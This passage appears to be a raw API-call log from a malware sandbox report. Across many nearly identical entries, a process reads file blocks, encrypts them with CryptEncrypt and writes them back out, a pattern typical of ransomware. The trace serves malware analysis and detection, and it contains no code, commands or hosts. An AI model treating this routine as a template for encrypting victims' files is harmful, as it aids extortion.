pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.517] GetLastError () returned 0x0 [0152.517] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.517] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.517] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.517] GetLastError () returned 0x0 [0152.517] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.517] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.517] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.517] GetLastError () returned 0x0 [0152.517] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.517] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.517] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.517] GetLastError () returned 0x0 [0152.517] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.517] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.517] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.517] GetLastError () returned 0x0 [0152.517] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.517] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.517] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.518] GetLastError () returned 0x0 [0152.518] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.518] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.518] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.518] GetLastError () returned 0x0 [0152.518] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.518] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.585] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.585] GetLastError () returned 0x0 [0152.585] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.585] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.585] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.585] GetLastError () returned 0x0 [0152.585] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.585] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.586] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.586] GetLastError () returned 0x0 [0152.586] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.586] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.586] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.586] GetLastError () returned 0x0 [0152.586] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.586] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.586] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.586] GetLastError () returned 0x0 [0152.586] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.586] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.586] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.586] GetLastError () returned 0x0 [0152.586] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.586] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.586] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.586] GetLastError () returned 0x0 [0152.586] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.586] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.586] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.586] GetLastError () returned 0x0 [0152.586] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.586] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.586] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.586] GetLastError () returned 0x0 [0152.586] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.586] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.587] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.587] GetLastError () returned 0x0 [0152.587] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.587] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.587] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.587] GetLastError () returned 0x0 [0152.587] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.587] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.587] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.587] GetLastError () returned 0x0 [0152.587] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.587] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.587] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.587] GetLastError () returned 0x0 [0152.587] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.587] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.587] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.587] GetLastError () returned 0x0 [0152.587] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.587] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.587] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.587] GetLastError () returned 0x0 [0152.587] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.588] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.588] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.588] GetLastError () returned 0x0 [0152.588] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.588] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.588] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.588] GetLastError () returned 0x0 [0152.588] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.588] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.588] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.588] GetLastError () returned 0x0 [0152.588] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.588] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.588] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.588] GetLastError () returned 0x0 [0152.588] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.588] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.588] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.588] GetLastError () returned 0x0 [0152.588] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.588] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.588] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.588] GetLastError () returned 0x0 [0152.588] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.588] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.589] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.589] GetLastError () returned 0x0 [0152.589] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.589] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.589] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.589] GetLastError () returned 0x0 [0152.589] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.589] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.589] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.589] GetLastError () returned 0x0 [0152.589] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.589] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.589] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.589] GetLastError () returned 0x0 [0152.589] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.589] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.589] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.589] GetLastError () returned 